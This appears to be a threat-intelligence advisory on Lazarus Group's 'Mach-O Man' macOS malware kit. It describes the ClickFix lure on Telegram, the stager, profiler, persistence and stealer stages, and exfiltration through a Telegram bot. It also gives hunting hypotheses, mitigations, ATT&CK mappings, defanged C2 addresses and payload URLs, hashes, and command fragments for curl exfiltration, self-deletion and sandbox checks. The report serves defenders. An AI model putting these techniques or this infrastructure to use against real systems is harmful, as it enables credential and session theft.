New Lazarus APT Campaign: “Mach-O Man” macOS Malware Kit Hits Businesses

Key Takeaways

• Lazarus Group is distributing a new macOS malware kit called 'Mach-O Man' via a ClickFix social engineering campaign on Telegram.
• The attack relies on users manually executing a malicious terminal command, bypassing traditional security controls.
• The malware consists of multiple Go-based Mach-O binaries: a stager, a profiler, a persistence module, and a stealer.
• Persistence is achieved by creating a LaunchAgent that disguises the malware as a OneDrive service.
• Stolen data, including browser sessions, extensions, and macOS Keychain entries, is exfiltrated via a Telegram bot.

Affected Systems

• macOS

Attack Chain

The attack begins with a social engineering lure on Telegram, directing the victim to a fake meeting page that prompts them to execute a terminal command. This command downloads and runs the 'teamsSDK.bin' stager, which drops a fake meeting application and downloads the 'D1YrHRTg.bin' profiler to fingerprint the system. Next, 'minst2.bin' establishes persistence by creating a LaunchAgent disguised as OneDrive. Finally, the 'macrasv2' stealer is executed to collect browser data, extensions, and macOS Keychain entries, archiving them into a ZIP file and exfiltrating the data via a Telegram bot before running a self-deletion script.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: No

The article does not provide specific detection rules but offers detailed behavioral indicators, file hashes, and network IOCs suitable for custom rule creation.

Detection Engineering Assessment

EDR Visibility: Medium — The attack relies on native macOS binaries and user-executed commands, which can blend in with legitimate administrative activity, though the creation of suspicious LaunchAgents and unusual curl commands should be visible. Network Visibility: Medium — Exfiltration occurs over the Telegram API (HTTPS), which is encrypted and often allowed in corporate environments, but communication with raw IP addresses on ports 8888 and 9999 is highly anomalous. Detection Difficulty: Moderate — The use of social engineering to trick users into executing the initial payload bypasses many automated defenses, but the subsequent behavior (LaunchAgent creation, sysctl fingerprinting, Telegram API exfiltration) provides solid detection opportunities.

Required Log Sources

• macOS Unified Log
• Endpoint Process Execution Logs
• Network Traffic Logs
• File Creation Logs

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Look for unusual sysctl commands querying CPU brand strings, often used for sandbox evasion.	Process Execution Logs	Discovery	Low
Identify the creation of LaunchAgents in ~/Library/LaunchAgents/ referencing suspicious binaries in hidden directories like ~/.local/bin/.	File Creation Logs	Persistence	Low
Monitor for curl commands making POST requests to the Telegram API, especially from non-browser processes.	Process Execution Logs, Network Logs	Exfiltration	Medium

Control Gaps

• User execution of arbitrary terminal commands
• Lack of strict egress filtering for Telegram API
• Execution of ad-hoc signed binaries

Key Behavioral Indicators

• Creation of com.onedrive.launcher.plist
• Execution of binaries from $TMPDIR
• Repeated curl POST requests to raw IPs or Telegram API
• Ad-hoc signed applications prompting for credentials

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Block known C2 IP addresses and domains.
• Search endpoint telemetry for the provided file hashes and suspicious file paths (e.g., ~/.local/bin/OneDrive).
• Revoke and rotate any credentials or session tokens for users suspected of compromise.

Infrastructure Hardening

• Implement strict egress filtering to block unauthorized communication on non-standard ports (e.g., 8888, 9999).
• Restrict the execution of ad-hoc signed binaries on macOS endpoints.

User Protection

• Deploy EDR solutions configured to monitor and block suspicious LaunchAgent creations.
• Restrict access to the macOS Terminal for non-developer users where feasible.

Security Awareness

• Educate employees on the risks of 'ClickFix' social engineering tactics, specifically warning against copying and pasting terminal commands from meeting invites or error pages.

MITRE ATT&CK Mapping

• T1204 - User Execution
• T1543.001 - Create or Modify System Process: Launch Agent
• T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
• T1222 - File and Directory Permissions Modification
• T1497 - Virtualization/Sandbox Evasion
• T1555 - Credentials from Password Stores
• T1552 - Unsecured Credentials
• T1082 - System Information Discovery
• T1057 - Process Discovery
• T1124 - System Time Discovery
• T1083 - File and Directory Discovery
• T1005 - Data from Local System
• T1560 - Archive Collected Data
• T1567 - Exfiltration Over Web Service

Additional IOCs

• Ips:
  • 172[.]86[.]113[.]102 - Payload hosting and C2 server
  • 144[.]172[.]114[.]220 - C2 and exfiltration server
• Domains:
  • update-teams[.]live - Fake Teams update domain
  • livemicrosft[.]com - Typosquatted Microsoft domain
• Urls:
  • hxxp://172[.]86[.]113[.]102/Onedrive - Payload URL for fake OneDrive binary
  • hxxps://update-teams[.]live/teams - Fake Teams update URL
  • hxxp://172[.]86[.]113[.]102/localencode - Payload URL for localencode binary
  • livemicrosft.com/meet/89035563931?p=9jXK14VFM8fObdKxfkake8tD7rPhzs.1 - Fake meeting invite URL
• File Hashes:
  • eb3eae776d175f7fb2fb9986c89154102ba8eabfde10a155af4dfb18f28be1b5 (SHA256) - com.onedrive.launcher.plist / com.onedrive.launcher.tmp
  • 0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90 (SHA256) - D1yCPUyk.bin / D1YrHRTg.bin (Profiler)
  • a9562ab6bce06e92d4e428088eacc1e990e67ceae6f6940047360261b5599614 (SHA256) - localencode / OneDrive
  • cc31b3dc8aeed0af9dd24b7e739f183527d55d5b5ecd3d93ba45dd4aaa8ba260 (SHA256) - MauroDPRKSamples.zip
  • 4b08a9e221a20b8024cf778d113732b3e12d363250231e78bae13b1f1dc1495b (SHA256) - minst2.bin (Persistence mechanism)
  • 89616a503ffee8fc70f13c82c4a5e4fa4efafa61410971f4327ed38328af2938 (SHA256) - SystemApp.zip
  • dfee6ea9cafc674b93a8460b9e6beea7f0eb0c28e28d1190309347fd1514dbb6 (SHA256) - TeamsApp.zip
  • 24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9 (SHA256) - ZoomApp.zip
• File Paths:
  • /Users/$USER/.local/bin/OneDrive - Dropped malicious binary masquerading as OneDrive
  • ~/Library/.initialized - Suspicious hidden file created by malware
  • ~/Library/LaunchAgents/com.onedrive.launcher.plist - Persistence LaunchAgent
  • ~/Library/LaunchAgents/com.onedrive.launcher.tmp - Temporary file during LaunchAgent creation
  • $TMPDIR/OneDrive - Temporary staging for OneDrive binary
  • $TMPDIR/geniex_client_sleep_state - Suspicious temporary file
  • bin.config - Malware configuration file
• Command Lines:
  • Purpose: Host fingerprinting for VM/sandbox evasion | Tools: sysctl, bash | Stage: Discovery | sysctl -n machdep.cpu.brand_string
  • Purpose: Data exfiltration to C2 | Tools: curl | Stage: Exfiltration | curl -s -X POST
  • Purpose: Self-deletion routine | Tools: rm, sh | Stage: Defense Evasion | rm -f
• Other:
  • a73ce18952b40fd621789e43c56b2af08d1497ce3560b2481fa973d8265ce491 - RC4 Key
  • 5476bbf8ddb2fb056295f09ebe05e20a7d1cf29ea279cd4613c87544013e080fef35c97b3511ef9c0f12e505a1d805628ba10483dc9290508f94d153ee94d5c4 - RC4 Key
  • GoBuildID: XSnX8a5Y1OweX0Ob6lfO/ZYlrxu-H_BNvt5ptXb3c/8HR_X2LwoFzXXN4Fti_K/xaM13na_g6snvgcy0x9t - Go Build ID artifact